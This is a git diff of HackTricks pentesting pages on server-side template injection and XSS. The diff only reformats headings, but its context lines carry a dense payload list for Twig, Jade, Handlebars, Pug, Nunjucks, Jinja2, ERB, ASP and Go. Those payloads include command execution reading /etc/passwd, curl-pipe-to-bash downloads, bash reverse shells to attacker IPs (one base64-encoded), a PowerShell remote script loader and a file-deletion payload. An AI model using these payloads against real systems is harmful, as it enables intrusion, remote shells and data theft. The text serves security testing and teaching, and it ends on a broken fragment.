* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty)
-#### Twig (PHP)
+### Twig (PHP)
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
@@ -423,7 +422,7 @@ Check the following page to learn more about the **exploitation of EL interprete
{{['cat$IFS/etc/passwd']|filter('system')}}
```
-**Twig - Template format**
+#### Twig - Template format
```php
$output = $twig > render (
@@ -437,12 +436,12 @@ $output = $twig > render (
);
```
-**More information**
+#### More information
* In Twig and Twig (Sandboxed) section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)
-#### Jade (NodeJS)
+### Jade (NodeJS)
```javascript
- var x = root.process
@@ -455,12 +454,12 @@ $output = $twig > render (
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
```
-**More information**
+#### More information
* In Jade section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)
-#### Handlebars (NodeJS)
+### Handlebars (NodeJS)
Path Traversal (more info [here](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)).
@@ -497,11 +496,11 @@ URLencoded:
%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%72%6d%20%2f%68%6f%6d%65%2f%63%61%72%6c%6f%73%2f%6d%6f%72%61%6c%65%2e%74%78%74%27%29%3b%22%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%7b%7b%2f%77%69%74%68%7d%7d
```
-**More information**
+#### More information
* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
-#### JsRender (NodeJS)
+### JsRender (NodeJS)
| **Template** | **Description** |
| ------------ | --------------------------------------- |
@@ -512,40 +511,40 @@ URLencoded:
* \= 49
-**Client Side**
+#### Client Side
```python
{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
```
-**Server Side**
+#### Server Side
```bash
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
```
-**More information**
+#### More information
* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)
-#### PugJs (NodeJS)
+### PugJs (NodeJS)
* `#{7*7} = 49`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`
-**Example server side render**
+#### Example server side render
```javascript
var pugjs = require('pug');
home = pugjs.render(injected_page)
```
-**More information**
+#### More information
* [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/)
-#### NUNJUCKS (NodeJS)
+### NUNJUCKS (NodeJS)
* \{{7\*7\}} = 49
* \{{foo\}} = No output
@@ -557,11 +556,11 @@ home = pugjs.render(injected_page)
{{range.constructor("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>&1\"')")()}}
```
-**More information**
+#### More information
* [http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine)
-#### ERB (Ruby)
+### ERB (Ruby)
* `{{7*7}} = {{7*7}}`
* `${7*7} = ${7*7}`
@@ -580,11 +579,11 @@ home = pugjs.render(injected_page)
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)
-#### Slim (Ruby)
+### Slim (Ruby)
* `{ 7 * 7 }`
@@ -592,11 +591,11 @@ home = pugjs.render(injected_page)
{ %x|env| }
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)
-#### Python
+### Python
Check out the following page to learn tricks about **arbitrary command execution bypassing sandboxes** in python:
@@ -604,7 +603,7 @@ Check out the following page to learn tricks about **arbitrary command execution
[bypass-python-sandboxes](../../misc/basic-python/bypass-python-sandboxes/)
{% endcontent-ref %}
-#### Tornado (Python)
+### Tornado (Python)
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
@@ -618,13 +617,12 @@ Check out the following page to learn tricks about **arbitrary command execution
{% endraw %}
-
{{os.system('whoami')}}
```
-**More information**
+#### More information
-#### Jinja2 (Python)
+### Jinja2 (Python)
[Official website](http://jinja.pocoo.org)
@@ -648,13 +646,12 @@ Check out the following page to learn tricks about **arbitrary command execution
-
{{settings.SECRET_KEY}}
{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
```
-**Jinja2 - Template format**
+#### Jinja2 - Template format
```python
{% raw %}
@@ -669,7 +666,7 @@ Check out the following page to learn tricks about **arbitrary command execution
{% endraw %}
```
-**Jinja2 - Debug Statement**
+#### Jinja2 - Debug Statement
If the Debug Extension is enabled, a \`
@@ -679,19 +676,17 @@ If the Debug Extension is enabled, a \`
-
{% raw %}
{% debug %}
{% endraw %}
-
```
Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement](https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement)
-**Jinja2 - Dump all used classes**
+#### Jinja2 - Dump all used classes
```python
{{ [].class.base.subclasses() }}
@@ -699,7 +694,7 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement]
{{ ''.__class__.__mro__[2].__subclasses__() }}
```
-**Jinja2 - Dump all config variables**
+#### Jinja2 - Dump all config variables
```python
{% raw %}
@@ -710,7 +705,7 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement]
{% endraw %}
```
-**Jinja2 - Read remote file**
+#### Jinja2 - Read remote file
```python
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
@@ -720,13 +715,13 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement]
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
```
-**Jinja2 - Write into remote file**
+#### Jinja2 - Write into remote file
```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
```
-**Jinja2 - Remote Code Execution**
+#### Jinja2 - Remote Code Execution
Listen for connection
@@ -767,7 +762,6 @@ More:
-
{% raw %}
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
{% endraw %}
@@ -795,7 +789,7 @@ More:
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
```
-**Jinja2 - Filter bypass**
+#### Jinja2 - Filter bypass
```python
request.__class__
@@ -834,12 +828,12 @@ Bypassing most common filters ('.','\_','|join','\[',']','mro' and 'base') by [h
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr(
```
-**More information**
+#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
* Check [attr trick to bypass blacklisted chars in here](../../misc/basic-python/bypass-python-sandboxes/#python3).
-#### Mako (Python)
+### Mako (Python)
```python
<%
@@ -849,7 +843,7 @@ x=os.popen('id').read()
${x}
```
-#### Razor (.Net)
+### Razor (.Net)
* `@(2+2) <= Success`
* `@() <= Success`
@@ -869,7 +863,7 @@ ${x}
* [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-\(SSTI\)-in-ASP.NET-Razor/)
* [https://www.schtech.co.uk/razor-pages-ssti-rce/](https://www.schtech.co.uk/razor-pages-ssti-rce/)
-#### ASP
+### ASP
* `<%= 7*7 %>` = 49
* `<%= "foo" %>` = foo
@@ -880,11 +874,11 @@ ${x}
<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
```
-**More Information**
+#### More Information
* [https://www.w3schools.com/asp/asp\_examples.asp](https://www.w3schools.com/asp/asp\_examples.asp)
-#### Mojolicious (Perl)
+### Mojolicious (Perl)
Even if it's perl it uses tags like ERB in Ruby.
@@ -896,7 +890,7 @@ Even if it's perl it uses tags like ERB in Ruby.
<% perl code %>
```
-#### SSTI in GO
+### SSTI in GO
The way to confirm that the template engine used in the backed is Go you can use these payloads:
@@ -905,14 +899,14 @@ The way to confirm that the template engine used in the backed is Go you can use
* `{{printf "%s" "ssti" }}` = should output the string ssti in the response
* `{{html "ssti"}}`, `{{js "ssti"}}` = These are a few other payloads which should output the string "ssti" without the trailing words "js" or "html". You can refer to more keywords in the engine [here](https://golang.org/pkg/text/template).
-**XSS exploitation**
+#### XSS exploitation
If the server is **using the text/template** package, XSS is very easy to achieve by **simply** providing your **payload** as input. However, that is **not the case with html/template** as itHTMLencodes the response: `{{""}}` --> `<script>alert(1)</script>`
However, Go allows to **DEFINE** a whole **template** and then **later call it**. The payload will be something like:\
`{{define "T1"}}{{end}} {{template "T1"}}`
-**RCE Exploitation**
+#### RCE Exploitation
The documentation for both the html/template module can be found [here](https://golang.org/pkg/html/template/), and the documentation for the text/template module can be found [here](https://golang.org/pkg/text/template/), and yes, they do vary, a lot. For example, in **text/templat**e, you can **directly call any public function with the “call” value**, this however, is not the case with html/template.
@@ -926,40 +920,41 @@ func (p Person) Secret (test string) string {
}
```
-**More information**
+#### More information
* [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html)
* [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)
-#### More Exploits
+### More Exploits
Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) for more exploits. Also you can find interesting tags information in [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
-### BlackHat PDF
+## BlackHat PDF
{% file src="../../.gitbook/assets/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf" %}
-### Related Help
+## Related Help
If you think it could be useful, read:
* [Flask tricks](../../pentesting/pentesting-web/flask.md)
* [Python magic functions](../../misc/basic-python/magic-methods.md)
-### Tools
+## Tools
{% embed url="https://github.com/epinna/tplmap" %}
-### Brute-Force Detection List
+## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
-### Practice & References
+## Practice & References
* [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
* [**https://portswigger.net/web-security/server-side-template-injection**](https://portswigger.net/web-security/server-side-template-injection)
+
Support HackTricks and get benefits!
@@ -975,3 +970,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,9 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## XSS (Cross Site Scripting)
-### Methodology
+# XSS (Cross Site Scripting)
+
+## Methodology
1. Check if **any value you control** (_parameters_, _path_, _headers_?, _cookies_?) is being **reflected** in the HTML or **used** by **JS** code.
2. **Find the context** where it's reflected/used.
@@ -49,7 +50,7 @@ When working on a complex XSS you might find interesting to know about:
[debugging-client-side-js.md](debugging-client-side-js.md)
{% endcontent-ref %}
-### Reflected values
+## Reflected values
In order to successfully exploit a XSS the first thing you need to find is a **value controlled by you that is being reflected** in the web page.
@@ -57,16 +58,16 @@ In order to successfully exploit a XSS the first thing you need to find is a **v
* **Stored and reflected**: If you find that a value controlled by you is saved in the server and is reflected every time you access a page you could exploit a **Stored XSS**.
* **Accessed via JS**: If you find that a value controlled by you is being access using JS you could exploit a **DOM XSS**.
-### Contexts
+## Contexts
When trying to exploit a XSS the first thing you need to know if **where is your input being reflected**. Depending on the context, you will be able to execute arbitrary JS code on different ways.
-#### Raw HTML
+### Raw HTML
If your input is **reflected on the raw HTML** page you will need to abuse some **HTML tag** in order to execute JS code: `XSS
@@ -243,12 +244,12 @@ If you **cannot escape from the tag**, you could create new attributes inside th ``` -#### Within the attribute +### Within the attribute Even if you **cannot escape from the attribute** (`"` is being encoded or deleted), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.\ Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`** -**Bypass inside event using HTML encoding/URL encode** +#### **Bypass inside event using HTML encoding/URL encode** The **HTML encoded characters** inside the value of HTML tags attributes are **decoded on runtime**. Therefore something like the following will be valid (the payload is in bold): `Go Back ` @@ -275,7 +276,7 @@ Note that **any kind of HTML encode is valid**: Click ``` -**Bypass inside event using Unicode encode** +#### Bypass inside event using Unicode encode ```javascript //For some reason you can use unicode to encode "alert" but not "(1)" @@ -283,7 +284,7 @@ Note that **any kind of HTML encode is valid**:;%20img.png){kind=link}